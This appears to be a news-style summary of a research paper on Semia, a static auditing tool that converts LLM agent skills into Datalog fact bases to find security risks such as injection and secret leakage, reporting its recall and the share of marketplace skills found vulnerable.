Semia: Auditing Agent Skills via Constraint-Guided Representation Synthesis
Semia is a static auditor for LLM-driven agent skills that uses constraint-guided synthesis to analyze security risks in hybrid code-and-prose configurations. Testing 13,728 real-world skills from public marketplaces, Semia identified critical semantic vulnerabilities in over half and achieved 97.7% recall, significantly outperforming existing security tools.
Semia addresses a critical security gap in the emerging ecosystem of AI agent skills—configurable packages that grant LLM-driven systems access to sensitive operations like blockchain transactions, shell commands, and email systems. Traditional static analyzers fail because they ignore the prose descriptions that govern when and how these capabilities execute, while LLM-based tools cannot reproducibly verify that malicious inputs reach dangerous functions. The research introduces a constraint-guided representation synthesis methodology that converts hybrid skill definitions into a Datalog fact base, enabling formal security analysis through reachability queries.
The findings carry significant implications for AI infrastructure security. With over 50% of tested skills containing at least one critical semantic risk, the research reveals a widespread vulnerability class that current security practices overlook. These risks span injection attacks, secret leakage, confused deputy problems, and unguarded sinks—issues that become increasingly consequential as AI agents gain access to blockchain transactions, financial systems, and privileged computing environments.
For the AI and crypto communities, this work establishes both a problem and a solution at an opportune moment. As enterprise adoption of LLM-based agents accelerates, automated security auditing becomes essential infrastructure. The 97.7% recall rate demonstrates that constraint-guided synthesis can bridge the gap between static analysis and semantic understanding, making large-scale auditing of agent skill marketplaces feasible. The research suggests that security tooling for agent systems requires fundamentally different approaches than traditional code analysis, creating potential market opportunities for dedicated auditing platforms.
- →Semia identified critical security vulnerabilities in 50%+ of 13,728 real-world AI agent skills, revealing widespread semantic risks overlooked by conventional tools.
- →Constraint-guided representation synthesis enables conversion of prose-based agent skill descriptions into formally analyzable Datalog fact bases.
- →Semia achieves 97.7% recall and 90.6% F1 score, substantially outperforming both signature-based scanners and LLM-based baseline approaches.
- →Security auditing of LLM-driven agents requires novel methodologies that account for probabilistic prose interpretation alongside structured code interfaces.
- →The research indicates urgent need for dedicated security infrastructure as AI agents gain access to blockchain transactions and sensitive computing operations.